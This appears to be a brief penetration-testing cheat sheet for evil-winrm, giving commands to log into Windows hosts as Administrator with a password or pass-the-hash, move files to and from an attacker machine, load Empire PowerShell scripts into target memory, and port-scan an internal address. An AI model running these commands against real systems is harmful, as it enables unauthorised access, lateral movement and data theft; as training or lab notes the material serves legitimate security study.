34 lines
838 B
Markdown
34 lines
838 B
Markdown
|
# evil-winrm
|
||
|
|
||
|
* Password or NTLM Hash as authenticator
|
||
|
|
||
|
```sh
|
||
|
evil-winrm -u Administrator -H <Hash> -i IP
|
||
|
evil-winrm -u Administrator -p <Password> -i IP -P <Port>
|
||
|
```
|
||
|
|
||
|
## Upload & Download
|
||
|
* On opened host
|
||
|
```sh
|
||
|
upload <attackerFilePath>
|
||
|
download <remoteFilePath> <attackerFilePath>
|
||
|
```
|
||
|
|
||
|
## Load Powershell Scripts into Target Memory
|
||
|
* Load attacker scripts into target's memory
|
||
|
```sh
|
||
|
evil-winrm -u <user> -p <password> -i IP -s <localScriptDir>
|
||
|
```
|
||
|
* As an example, load Empire scripts dir for port scanning
|
||
|
```sh
|
||
|
evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/
|
||
|
```
|
||
|
|
||
|
* Init `Invoke-Portscan.ps1`
|
||
|
* `Get-Help Invoke-Portscan`
|
||
|
```sh
|
||
|
Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50
|
||
|
```
|
||
|
|
||
|
|